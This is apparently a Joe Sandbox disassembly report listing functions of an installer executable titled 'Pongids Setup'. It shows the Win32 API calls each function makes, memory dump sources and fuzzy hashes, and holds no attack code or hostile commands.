                                                                            • lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404695,000000DF,00000000,00000400,?), ref: 00404818
                                                                            • wsprintfA.USER32 ref: 00404820
                                                                            • SetDlgItemTextA.USER32(?,0079E540), ref: 00404833
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s$@y
                                                                            • API String ID: 3540041739-3020698753
                                                                            • Opcode ID: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
                                                                            • Instruction ID: 9c2068d9445a5b6f252536eabbf1c91049bb0fb02782bdd1491d607ad1f2c465
                                                                            • Opcode Fuzzy Hash: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
                                                                            • Instruction Fuzzy Hash: E711E773A041283BDB0065699C45EAF3698DB86334F254237FA25F31D1EA78CC1182E9
                                                                            Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?), ref: 00401D3F
                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                                            • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                                            • DeleteObject.GDI32(00000000), ref: 00401D8A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: 978bdc3de84591c5b34c529a30ac5b154b9d899f544855d7d9a99db957ba7817
                                                                            • Instruction ID: b8adc288744d91ba617009adb3e02bef21eb0d6e3f954176feac09388768b409
                                                                            • Opcode Fuzzy Hash: 978bdc3de84591c5b34c529a30ac5b154b9d899f544855d7d9a99db957ba7817
                                                                            • Instruction Fuzzy Hash: 45F0FFB2A04119BFE701EBA4DE88DAFB7BCEB44301B104466F601F2191C7749D018B79
                                                                            Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: 182774ec21bf90fa89628062bdc31045ec8b3e2a1ef169624933301e1dab061d
                                                                            • Instruction ID: 44e87a32571ed3235eb7b96b36fbe9a42cad9ebb5189372230b031547819aef2
                                                                            • Opcode Fuzzy Hash: 182774ec21bf90fa89628062bdc31045ec8b3e2a1ef169624933301e1dab061d
                                                                            • Instruction Fuzzy Hash: ED21A271E44208BEEB15EFA4DA46AED7FB1EF84314F24403EF101B61D1DA788640DB28
                                                                            Function 004039E5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowTextA.USER32(00000000,Pongids Setup), ref: 00403A7D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: TextWindow
                                                                            • String ID: "C:\Users\user\Desktop\nRNzqQOQwk.exe"$1033$Pongids Setup
                                                                            • API String ID: 530164218-4097393825
                                                                            • Opcode ID: 6c45f722f9a7ae4fb793d3ca626f1132432b1c01d3db27434527fc1e6ec0313f
                                                                            • Instruction ID: 535a85070ebab7a8ba56d21747a6201fabbada84c5c70f31dda2a066eb9b82e2
                                                                            • Opcode Fuzzy Hash: 6c45f722f9a7ae4fb793d3ca626f1132432b1c01d3db27434527fc1e6ec0313f
                                                                            • Instruction Fuzzy Hash: D1110E35B002019FD7209F15DC80A377B6CEBCA355728823BE841A73A0D73D9D028BA8
                                                                            Function 00405812 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040316D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405818
                                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040316D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405821
                                                                            • lstrcatA.KERNEL32(?,00409014), ref: 00405832
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405812
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-3355392842
                                                                            • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                            • Instruction ID: 0a665bc2143073433464dc8fd220d9afc6aaff2f2e3703ee86bb110f897cf778
                                                                            • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                            • Instruction Fuzzy Hash: DDD0A9A3606930AAE30222158C09EDF2A58CF12340B048037F200B22A2C63C8E418BFE
                                                                            Function 004058AB Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,765F3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                                            • CharNextA.USER32(00000000), ref: 004058BE
                                                                            • CharNextA.USER32(00000000), ref: 004058D2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext
                                                                            • String ID: C:\
                                                                            • API String ID: 3213498283-3404278061
                                                                            • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                            • Instruction ID: e63bfe958a3d000d539ac339b3831bddf0e80049928d73a3bf58654b49e63fc9
                                                                            • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                            • Instruction Fuzzy Hash: 5CF0F653904F552AFB3272280C40B775B88DB5A361F14C077EE40B62C1D27C4C609FAA
                                                                            Function 00402C96 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000,00402E76,00000001), ref: 00402CA9
                                                                            • GetTickCount.KERNEL32 ref: 00402CC7
                                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402C13,00000000), ref: 00402CE4
                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402CF2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: e47f6d303f75ebd17c716a95d6a18f35b6dc664df62f34b119683803831f88dc
                                                                            • Instruction ID: 9ab3963fa07bdcc1a95f8d1ddaaeb6e773ff80e4731962a5f71ef67b0361f4de
                                                                            • Opcode Fuzzy Hash: e47f6d303f75ebd17c716a95d6a18f35b6dc664df62f34b119683803831f88dc
                                                                            • Instruction Fuzzy Hash: B9F03030809521AFD6125B24FF8EDDE7A64AB41701B114477F414B11E4D7781885CBD9
                                                                            Function 00404F2D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00404F5C
                                                                            • CallWindowProcA.USER32(?,?,?,?), ref: 00404FAD
                                                                              • Part of subcall function 00403FD1: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403FE3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                            • Instruction ID: b201a4cd8f35b1f81cb2229438f9677fc33f9f69eb2c65fa3af33e2f38b160ff
                                                                            • Opcode Fuzzy Hash: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                            • Instruction Fuzzy Hash: C9015EB150424AAFDF209F61DD81A5B3A26E7C4758F104037FB04B52D1D37AAC929A6E
                                                                            Function 00405531 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 0040555A
                                                                            • CloseHandle.KERNEL32(?), ref: 00405567
                                                                            Strings
                                                                            • Error launching installer, xrefs: 00405544
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID: Error launching installer
                                                                            • API String ID: 3712363035-66219284
                                                                            • Opcode ID: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                                            • Instruction ID: a44fcad5754d04da23f251c2f5d6a8b7866741138784f0b9a4d91a551686e283
                                                                            • Opcode Fuzzy Hash: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                                            • Instruction Fuzzy Hash: 93E0BFF4A002097FEB10AB64ED49F7B7BADEB00644F408561FD10F6190E674A9549A79
                                                                            Function 0040368B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,765F3410,00000000,C:\Users\user\AppData\Local\Temp\,00403663,0040347D,?), ref: 004036A5
                                                                            • GlobalFree.KERNEL32(00827080), ref: 004036AC
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040368B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
